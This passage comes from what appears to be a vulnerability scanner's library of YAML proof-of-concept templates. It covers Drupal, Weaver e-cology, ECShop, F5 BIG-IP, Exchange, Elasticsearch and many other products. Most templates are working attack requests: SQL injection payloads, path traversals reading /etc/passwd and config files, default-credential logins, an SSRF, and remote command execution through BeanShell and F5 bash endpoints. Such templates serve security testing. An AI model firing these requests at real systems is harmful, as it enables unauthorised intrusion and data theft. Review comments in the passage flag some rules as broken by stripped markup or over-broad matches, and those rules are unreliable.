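    path: /?q=node&destination=node
    body: >-
      pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
      updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
    follow_redirects: false
    expression: |
      response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
  Affected Version: "Drupal < 7.32"
  links:
    - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704
--------------------------------------------------------------------------------
/src/plugins/pocs/dubbo-admin-default-password.yml:
--------------------------------------------------------------------------------
# Dubbo Admin default HTTP Basic credentials. `groups` means either group
# alone is a finding: cm9vdDpyb290 = "root:root", Z3Vlc3Q6Z3Vlc3Q= = "guest:guest".
name: poc-yaml-dubbo-admin-default-password
groups:
  root:
    - method: GET
      path: /
      headers:
        Authorization: Basic cm9vdDpyb290
      expression: |
        response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": root', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
  guest:
    - method: GET
      path: /
      headers:
        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
      expression: |
        response.status == 200 && response.body.bcontains(b"Dubbo Admin") && response.body.bcontains(b": guest', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
detail:
  author: mumu0215(https://github.com/mumu0215)
  links:
    - https://www.cnblogs.com/wishwzp/p/9438658.html
--------------------------------------------------------------------------------
/src/plugins/pocs/duomicms-sqli.yml:
--------------------------------------------------------------------------------
# DuomiCMS < 3.0 error-based injection (extractvalue) in ajax.php.
# NOTE(review): (1) no status check - only the body marker constrains the
# match; (2) MySQL truncates the XPATH error text to 32 characters and
# concat_ws(1,1,md5(...)) prefixes two characters, so only the first 30
# digest characters would be echoed - matching the FULL 32-char digest may
# never succeed. Verify against a live instance; if confirmed, match a
# digest prefix the way the ecshop rules do.
name: poc-yaml-duomicms-sqli
rules:
  - method: GET
    path: >-
      /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
    follow_redirects: false
    expression: |
      response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
detail:
  author: hanxiansheng26(https://github.com/hanxiansheng26)
  Affected Version: "duomicms<3.0"
  links:
    - https://xz.aliyun.com/t/2828
--------------------------------------------------------------------------------
/src/plugins/pocs/dvr-cve-2018-9995.yml:
--------------------------------------------------------------------------------
# TBK/DVR CVE-2018-9995: the `uid=admin` cookie alone authorises the user
# list endpoint, which returns credentials as JSON.
name: poc-yaml-dvr-cve-2018-9995
rules:
  - method: GET
    path: >-
      /device.rsp?opt=user&cmd=list
    headers:
      Cookie: uid=admin
    follow_redirects: true
    expression: >
      response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "DVR"
  links:
    - https://s.tencent.com/research/bsafe/474.html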
--------------------------------------------------------------------------------
/src/plugins/pocs/e-office-v10-sql-inject.yml:
--------------------------------------------------------------------------------
# Weaver e-office v10 unauthenticated SQL injection (leave_record.php,
# table_field_name is concatenated into the query; user() is the probe).
# NOTE(review): `name` lacks the `poc-yaml-` prefix every sibling uses.
# TODO(review): the bytes literal in the expression spans several lines and
# contains only the Chinese text "no matching data found" - the HTML tags
# around it were almost certainly stripped when this file was rendered, so
# the expression is not valid as shown and the marker must be restored from
# the original file before use. Matching a "no data" message is also a weak
# signal on its own; confirm it is absent from a patched instance.
name: e-office-v10-sql-inject
rules:
  - method: GET
    path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b'

未找到相关数据

')
detail:
  author: Print1n(https://github.com/Print1n)
  # description (Chinese): "Weaver eoffice v10 front-end SQL injection",
  # followed by a FOFA fingerprint query for locating instances.
  description: |
    泛微 eoffice v10 前台 SQL 注入
    FOFA:fid="2csJpuWtfTdSAavIfJTuBw=="
  links:
    - https://www.hedysx.com/2777.html
--------------------------------------------------------------------------------
/src/plugins/pocs/e-zkeco-cnvd-2020-57264-read-file.yml:
--------------------------------------------------------------------------------
# ZKTeco E-ZKEco arbitrary file read: /iclock/<anything>/windows/win.ini.
# Windows-only marker ("for 16-bit app support" is the win.ini header).
name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file
rules:
  - method: GET
    path: /iclock/ccccc/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
  author: ThestaRY (https://github.com/ThestaRY7/)
  links:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
  info: E-ZKEco readfileCNVD-2020-57264
--------------------------------------------------------------------------------
/src/plugins/pocs/ecology-filedownload-directory-traversal.yml:
--------------------------------------------------------------------------------
# Weaver e-cology: ln.FileDownload path traversal reading WEB-INF/web.xml.
# NOTE(review): "/weaver/" is a weak marker for a web.xml read - it can
# appear in ordinary e-cology pages too; a web.xml-specific token (servlet
# or mapping element text) would make the match attributable.
name: poc-yaml-ecology-filedownload-directory-traversal
rules:
  - method: GET
    path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"/weaver/")
detail:
  author: l1nk3r
  links:
    - https://www.weaver.com.cn/cs/securityDownload.asp
--------------------------------------------------------------------------------
/src/plugins/pocs/ecology-javabeanshell-rce.yml:
--------------------------------------------------------------------------------
# Weaver e-cology BeanShell servlet RCE: evaluates print(r1*r2) and expects
# the product back (raw output mode). Arbitrary code execution on the target.
name: poc-yaml-ecology-javabeanshell-rce
set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  - method: POST
    path: /weaver/bsh.servlet.BshServlet
    body: >-
      bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
  author: l1nk3r
  links:
    - https://www.weaver.com.cn/cs/securityDownload.asp
--------------------------------------------------------------------------------
/src/plugins/pocs/ecology-springframework-directory-traversal.yml:
--------------------------------------------------------------------------------
# Weaver e-cology: Spring ResourceServlet exposing WEB-INF/web.xml.
# Same weak "/weaver/" marker as ecology-filedownload-directory-traversal.
name: poc-yaml-ecology-springframework-directory-traversal
rules:
  - method: GET
    path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"/weaver/")
detail:
  author: l1nk3r
  links:
    - https://www.weaver.com.cn/cs/securityDownload.asp
--------------------------------------------------------------------------------
/src/plugins/pocs/ecology-syncuserinfo-sqli.yml:
--------------------------------------------------------------------------------
# Weaver e-cology SyncUserInfo.jsp union-based injection (MSSQL str()).
# The product r1*r2 is computed server-side and must echo back.
name: poc-yaml-ecology-syncuserinfo-sqli
set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  - method: GET
    path: >-
      /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://www.weaver.com.cn/
--------------------------------------------------------------------------------
/src/plugins/pocs/ecology-v8-sqli.yml:
--------------------------------------------------------------------------------
# Weaver e-cology v8 getdata.jsp: the `sql` parameter is executed verbatim,
# so a SELECT of the random product is a direct proof.
name: poc-yaml-ecology-v8-sqli
set:
  r1: randomInt(1000, 9999)
  r2: randomInt(1000, 9999)
rules:
  - method: GET
    path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))

detail:
  author: Print1n(http://print1n.top)
  links:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
--------------------------------------------------------------------------------
/src/plugins/pocs/ecshop-cnvd-2020-58823-sqli.yml:
--------------------------------------------------------------------------------
# ECShop delete_cart_goods.php error-based injection. The XPATH error text is
# capped at 32 characters and the payload prefixes "~", so only the first 31
# digest characters are expected: substr(md5, 0, 31).
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
set:
  r1: randomInt(40000, 44800)
rules:
  - method: POST
    path: /delete_cart_goods.php
    body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
    expression: |
      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
  author: 凉风(http://webkiller.cn/)
  links:
    - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw
--------------------------------------------------------------------------------
/src/plugins/pocs/ecshop-collection-list-sqli.yml:
--------------------------------------------------------------------------------
# ECShop 2.x/3.x collection_list injection via a forged serialized
# X-Forwarded-Host. The `s:55:"..."` length is tied to a 5-digit r1 - keep
# randomInt(10000, 99999) or the PHP unserialize() fails. insert(md5,1,1,0x7e)
# replaces the first digest character with "~", hence substr(md5, 1, 32).
# NOTE(review): no status check; only the body marker constrains the match.
name: poc-yaml-ecshop-collection-list-sqli
set:
  r1: randomInt(10000, 99999)
rules:
  - method: GET
    path: /user.php?act=collection_list
    headers:
      X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
    follow_redirects: false
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
detail:
  author: 曦shen
  links:
    - https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli
--------------------------------------------------------------------------------
/src/plugins/pocs/ecshop-login-sqli.yml:
--------------------------------------------------------------------------------
# ECShop user.php?act=login injection via a forged serialized Referer.
# The `s:71:"..."` length is tied to a 5-digit r1 (see the sibling rule).
# NOTE(review): no status check; only the body marker constrains the match.
name: poc-yaml-ecshop-login-sqli
set:
  r1: randomInt(10000, 99999)
rules:
  - method: GET
    path: /user.php?act=login
    headers:
      Content-Type: application/x-www-form-urlencoded
      Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:71:"0,1 procedure analyse(updatexml(1,insert(md5({{r1}}),1,1,0x7e),1),1)-- -";s:2:"id";i:1;}
    follow_redirects: false
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
detail:
  author: chalan630
  links:
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
--------------------------------------------------------------------------------
/src/plugins/pocs/eea-info-leak-cnvd-2021-10543.yml:
--------------------------------------------------------------------------------
# MessageSolution EEA: authenticationserverservlet leaks account data.
# TODO(review): both regexes are literally `(.*?)`, which matches ANY body
# (even an empty one), so as rendered this rule fires on every HTTP 200.
# The element names around the capture groups were very likely stripped as
# markup when the file was rendered; restore them before using this POC.
name: poc-yaml-eea-info-leak-cnvd-2021-10543
rules:
  - method: GET
    path: "/authenticationserverservlet"
    expression: |
      response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body)
detail:
  author: Search?=Null
  description: "MessageSolution Enterprise Email Archiving (EEA) Info Leak."
  links:
    - https://exp1orer.github.io
--------------------------------------------------------------------------------
/src/plugins/pocs/elasticsearch-cve-2015-3337-lfi.yml:
--------------------------------------------------------------------------------
# Elasticsearch site-plugin path traversal (head plugin) reading /etc/passwd.
# NOTE(review): relies on the HTTP client sending the `../` segments raw;
# if the engine normalises paths before sending, the traversal never reaches
# the server - confirm against the scanner's request builder.
name: poc-yaml-elasticsearch-cve-2015-3337-lfi
rules:
  - method: GET
    path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)

detail:
  author: X.Yang
  links:
    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337
--------------------------------------------------------------------------------
/src/plugins/pocs/elasticsearch-unauth.yml:
--------------------------------------------------------------------------------
# Elasticsearch without authentication: banner on / plus the /_cat endpoint
# index being readable anonymously.
name: poc-yaml-elasticsearch-unauth
rules:
  - method: GET
    path: /
    follow_redirects: false
    expression: |
      response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search")
  - method: GET
    path: /_cat
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"/_cat/master")
detail:
  author: p0wd3r
  links:
    - https://yq.aliyun.com/articles/616757
--------------------------------------------------------------------------------
/src/plugins/pocs/etcd-v3-unauth.yml:
--------------------------------------------------------------------------------
# etcd v3 endpoint discovery via /version.
# NOTE(review): /version is served without credentials even when etcd auth is
# enabled, so "etcdserver" in the response proves an etcd endpoint is
# reachable, not that the key-value API is unauthenticated. Treat this as a
# fingerprint, or add a rule that reads data through the v3 API to claim
# "unauth".
name: poc-yaml-etcd-v3-unauth
rules:
  - method: GET
    path: /version
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"etcdserver")

detail:
  author: rj45(https://github.com/INT2ECALL)
  links:
    - https://networksec.blog.csdn.net/article/details/144912358?spm=1001.2014.3001.5502
-------------------------------------------------------------------------------- /src/plugins/pocs/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://github.com/mstxq17/CodeCheck/ 12 | - https://www.anquanke.com/post/id/168991 -------------------------------------------------------------------------------- /src/plugins/pocs/exchange-cve-2021-26855-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-exchange-cve-2021-26855-ssrf 2 | rules: 3 | - method: GET 4 | path: /owa/auth/x.js 5 | headers: 6 | Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; 7 | follow_redirects: false 8 | expression: | 9 | response.headers["X-CalculatedBETarget"].icontains("localhost") 10 | detail: 11 | author: sharecast 12 | Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" 13 | links: 14 | - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/eyou-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eyou-email-system-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | 
r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /webadm/?q=moni_detail.do&action=gragh 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | type='|expr%20{{r1}}%20%2B%20{{r2}}||' 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | detail: 15 | author: Print1n(http://print1n.top) 16 | description: 亿邮电子邮件系统 远程命令执行漏洞 17 | links: 18 | - https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/ezoffice-dpwnloadhttp.jsp-filedownload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ezoffice-downloadhttp.jsp-filedownload 2 | rules: 3 | - method: GET 4 | path: /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.headers["filename"].contains("../public/edit/jsp/config.jsp") 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20downloadhttp.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md 13 | tags: ezoffice,file,download 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-cve-2021-22986.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-cve-2021-22986 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /mgmt/tm/util/bash 8 | headers: 9 | 
Content-Type: application/json 10 | Authorization: Basic YWRtaW46 11 | X-F5-Auth-Token: " " 12 | body: >- 13 | {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"} 14 | follow_redirects: false 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 17 | detail: 18 | author: Hex 19 | links: 20 | - https://support.f5.com/csp/article/K03009991 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-cve-2022-1388.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-cve-2022-1388 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /mgmt/tm/util/bash 8 | headers: 9 | Content-Type: application/json 10 | Connection: keep-alive, x-F5-Auth-Token 11 | X-F5-Auth-Token: a 12 | Authorization: Basic YWRtaW46 13 | body: >- 14 | {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"} 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 18 | detail: 19 | author: jindaxia 20 | links: 21 | - https://support.f5.com/csp/article/K23605346 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-tmui-cve-2020-5902-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-tmui-cve-2020-5902-rce 2 | rules: 3 | - method: POST 4 | path: >- 5 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | body: fileName=%2Fetc%2Ff5-release 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"BIG-IP release") 12 | detail: 13 | author: Jing Ling 14 | links: 15 | - https://support.f5.com/csp/article/K52145254 16 | - 
https://github.com/rapid7/metasploit-framework/pull/13807/files 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | Affected Version: "4.3" 12 | links: 13 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 8 | detail: 9 | author: l1nk3r(http://www.lmxspace.com/) 10 | links: 11 | - http://foreversong.cn/archives/1378 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/finereport-v8-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fineReport-v8.0-arbitrary-file-read 2 | rules: 3 | - method: GET 4 | path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA") 8 | detail: 9 | author: Facker007(https://github.com/Facker007) 10 | links: 11 | - 
http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | rules: 3 | - method: GET 4 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 5 | expression: | 6 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/fortigate-cve-2018-13379-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fortigate-cve-2018-13379-readfile 2 | 3 | rules: 4 | - method: GET 5 | path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | follow_redirects: true 9 | expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient")) 10 | detail: 11 | author: tom0li(https://tom0li.github.io/) 12 | links: 13 | - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/frp-dashboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-frp-dashboard-unauth 2 | groups: 3 | unauth: 4 | - 
method: GET 5 | path: /api/proxy/tcp 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 9 | defaultpassword: 10 | - method: GET 11 | path: /api/proxy/tcp 12 | follow_redirects: false 13 | expression: | 14 | response.status == 401 && response.body.bcontains(b"Unauthorized") 15 | - method: GET 16 | path: /api/proxy/tcp 17 | headers: 18 | Authorization: Basic YWRtaW46YWRtaW4= 19 | follow_redirects: false 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/gateone-cve-2020-35736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gateone-cve-2020-35736 2 | rules: 3 | - method: GET 4 | follow_redirects: true 5 | path: "/" 6 | expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"") 7 | - method: GET 8 | follow_redirects: false 9 | path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 10 | expression: | 11 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | detail: 13 | author: tangshoupu 14 | links: 15 | - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | set: 3 | r1: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /admin/sql?query=SELECT%20md5({{r1}}) 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(r1)))) 9 | detail: 10 | author: PickledFish(https://github.com/PickledFish) 11 | links: 12 | - 
https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/gitlab-ssrf-cve-2021-22214.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gitlab-ssrf-cve-2021-22214 2 | rules: 3 | - method: POST 4 | path: /api/v4/ci/lint 5 | headers: 6 | Content-Type: application/json 7 | body: | 8 | {"include_merged_yaml": true, "content": "include:\n remote: http://baidu.com/api/v1/targets/?test.yml"} 9 | expression: | 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched")) 11 | detail: 12 | author: mumu0215(https://github.com/mumu0215) 13 | links: 14 | - https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | rules: 3 | - method: GET 4 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 8 | detail: 9 | version: <4.1.0 10 | author: sharecast 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 -------------------------------------------------------------------------------- /src/plugins/pocs/go-pprof-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-go-pprof-leak 2 | rules: 3 | - method: GET 4 | path: "/debug/pprof/" 5 | expression: | 6 | response.status == 200 && 
response.body.bcontains(bytes(string(b"Types of profiles available"))) && response.body.bcontains(bytes(string(b"Profile Descriptions"))) 7 | - method: GET 8 | path: "/debug/pprof/goroutine?debug=1" 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(b"goroutine profile: total"))) 11 | detail: 12 | author: pa55w0rd(www.pa55w0rd.online/) 13 | Affected Version: "go pprof leak" 14 | links: 15 | - https://cloud.tencent.com/developer/news/312276 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/gocd-cve-2021-43287.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gocd-cve-2021-43287 2 | groups: 3 | linux0: 4 | - method: GET 5 | path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd 6 | follow_redirects: false 7 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | windows0: 9 | - method: GET 10 | path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini 11 | follow_redirects: false 12 | expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 13 | detail: 14 | author: For3stCo1d (https://github.com/For3stCo1d) 15 | description: "Gocd-file-read" 16 | links: 17 | - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/h2-database-web-console-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h2-database-web-console-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /h2-console 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Welcome to H2") 8 | search: | 9 | location.href = 
'(?P.+?)' 10 | - method: GET 11 | path: /h2-console/{{token}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"Generic H2") 14 | detail: 15 | author: jujumanman (https://github.com/jujumanman) 16 | links: 17 | - https://blog.csdn.net/zy15667076526/article/details/111413979 18 | - https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/h3c-secparh-any-user-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h3c-secparh-any-user-login 2 | rules: 3 | - method: GET 4 | path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 5 | expression: | 6 | response.status == 200 && "错误的id".bmatches(response.body) && "审计管理员".bmatches(response.body) && "admin".bmatches(response.body) 7 | detail: 8 | author: Print1n(https://print1n.top) 9 | links: 10 | - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E 11 | 